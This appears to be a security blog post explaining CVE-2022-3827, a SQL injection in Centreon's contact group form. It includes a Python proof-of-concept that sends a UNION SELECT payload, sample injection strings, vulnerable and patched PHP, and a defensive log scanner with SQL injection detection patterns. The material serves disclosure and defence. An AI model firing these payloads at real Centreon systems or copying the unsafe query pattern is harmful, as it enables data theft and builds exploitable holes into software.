In October 2022, security researchers uncovered a critical SQL injection vulnerability in Centreon, an open-source IT infrastructure monitoring platform widely used in enterprise environments. Registered as CVE-2022-3827 (and VDB-212794), this flaw exposes sensitive backend data: it could reveal administrator accounts and passwords, or even let an attacker take control of the whole Centreon system.
This post breaks down CVE-2022-3827 in plain, simple terms, provides sample exploit code, reference links, and explains how to defend against this threat.
- Attack Vector: Remote, unauthenticated or authenticated (depends on scenario)
- Patch: 293b10628f7d9f83c6c82c78cf637cbe9b907369
- Identifier: CVE-2022-3827, VDB-212794
What is SQL Injection?
SQL Injection is a technique that allows an attacker to run malicious SQL code on a backend database. By manipulating trusted input, like form fields or URL parameters, the attacker can steal data, escalate privileges, or even destroy data if not stopped.
Why is it dangerous?
Because Centreon manages monitoring data, credentials, configurations, and often has deep access to your infrastructure.
How the Vulnerability Works
The vulnerable file, formContactGroup.php, takes user input from the cg_id parameter (Contact Group ID). The expected behavior is to use this input to select or update database records. However, input validation is missing or weak.
Vulnerable Code Example (Simplified)
// Pseudocode representing the vulnerable logic
$cg_id = $_GET['cg_id'];
$query = "SELECT * FROM contact_groups WHERE cg_id = $cg_id";
$result = mysqli_query($db, $query); // BAD: Unsafe input in SQL query!
If cg_id is set to a malicious value, for example 10 OR 1=1, it breaks out of the intended numeric context and runs arbitrary SQL.
The resulting query is:
SELECT * FROM contact_groups WHERE cg_id = 10 OR 1=1
Now, all contact groups get returned to the attacker.
With further creativity, an attacker could access sensitive tables, dump Centreon credentials, or plant a new admin account.
Proof-of-Concept Exploit
Below is a simplified Python script that triggers the vulnerability and dumps table names. This is for education only; do NOT use it on systems without explicit permission.
import requests

# URL of the vulnerable Centreon instance
url = "http://target-centreon/formContactGroup.php"

# Malicious payload: UNION-based read of table names from information_schema as proof
payload = "1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables -- "
params = {"cg_id": payload}

# Send the request
r = requests.get(url, params=params)

if "information_schema" in r.text or "centreon" in r.text:
    print("[+] Vulnerability confirmed!")
    print(r.text)
else:
    print("[-] Target might not be vulnerable.")
With simple modifications, an attacker could list users and password hashes, or execute inserts, updates, or deletes.
- Impact: complete takeover of the Centreon instance.
- It is remotely exploitable, so attackers do not need to be on the internal network or hold privileged accounts (in some configurations).
Official Patch
The Centreon team released a patch to address this issue:
Commit: 293b10628f7d9f83c6c82c78cf637cbe9b907369
What does the fix do?
The patch replaces direct variable interpolation in SQL queries with prepared statements, or safely escapes incoming variables before they reach the query.
Example Secure Code
$cg_id = intval($_GET['cg_id']); // strong input validation
$stmt = $db->prepare("SELECT * FROM contact_groups WHERE cg_id = ?");
$stmt->bind_param("i", $cg_id);
$stmt->execute();
$result = $stmt->get_result();
Check Exposure:
If your formContactGroup.php file is exposed to untrusted users, scan your web server access logs for requests whose cg_id parameter contains SQL fragments (OR 1=1, UNION SELECT, information_schema, comment sequences such as --) instead of a plain integer.
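Below is an added example of that log check, written for this post rather than taken from it or from Centreon: it parses combined-format access log lines, URL-decodes the cg_id parameter, and reports every request whose cg_id is not a plain integer, with the SQL fragment that tripped it. The log lines, hosts and timestamps are constructed, and the pattern lists and function names are my own assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines in combined log format; hosts, paths and timestamps are
# made up. The scanner keys on the cg_id parameter rather than on the path, because
# the path that reaches formContactGroup.php depends on the deployment.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Nov/2022:10:01:02 +0000] "GET /centreon/formContactGroup.php?cg_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Nov/2022:10:02:17 +0000] "GET /centreon/formContactGroup.php?cg_id=10%20OR%201%3D1 HTTP/1.1" 200 90210 "-" "python-requests/2.28"
10.0.0.9 - - [03/Nov/2022:10:02:40 +0000] "GET /centreon/formContactGroup.php?cg_id=1+UNION+SELECT+1%2Ctable_name%2C3%2C4+FROM+information_schema.tables+--+ HTTP/1.1" 200 120000 "-" "python-requests/2.28"
10.0.0.5 - - [03/Nov/2022:10:03:00 +0000] "GET /centreon/index.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# client identd user [timestamp] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Fragments that have no business in an integer id: boolean tautologies,
# UNION reads, schema probing, comment sequences, statement separators, quotes.
SQLI_MARKERS = re.compile(
    r"\bor\b\s+\S+\s*=\s*\S+|\bunion\b\s+(?:all\s+)?select\b|information_schema|--|/\*|;|'|\"",
    re.IGNORECASE,
)

def classify_cg_id(value):
    """None when value is the plain integer the form expects, else a reason string."""
    if re.fullmatch(r"-?\d+", value.strip()):
        return None
    # parse_qs decoded once already; decode again to catch double-encoded payloads
    for candidate in (value, unquote_plus(value)):
        hit = SQLI_MARKERS.search(candidate)
        if hit:
            return f"matched {hit.group(0)!r}"
    return "non-numeric cg_id"

def scan_log(text):
    """One finding per request whose cg_id parameter is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in params.get("cg_id", []):
            reason = classify_cg_id(raw)
            if reason:
                findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                                 "cg_id": raw, "reason": reason})
    return findings
```

Run scan_log over your real access log text; a 200 status on a flagged request is the case to investigate first, since the form did not reject the input.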
References
- NIST NVD - CVE-2022-3827
- VulDB VDB-212794
- Centreon GitHub Patch Commit
- What is SQL Injection? (OWASP)
Conclusion
CVE-2022-3827 in Centreon’s Contact Groups Form is a severe, remotely exploitable SQL injection. If you use Centreon, upgrade right away and inspect logs for past attacks. Keep your monitoring systems safe—they are the eyes and ears of your infrastructure!
Timeline
Published on: 11/02/2022 13:15:00 UTC
Last modified on: 11/04/2022 03:51:00 UTC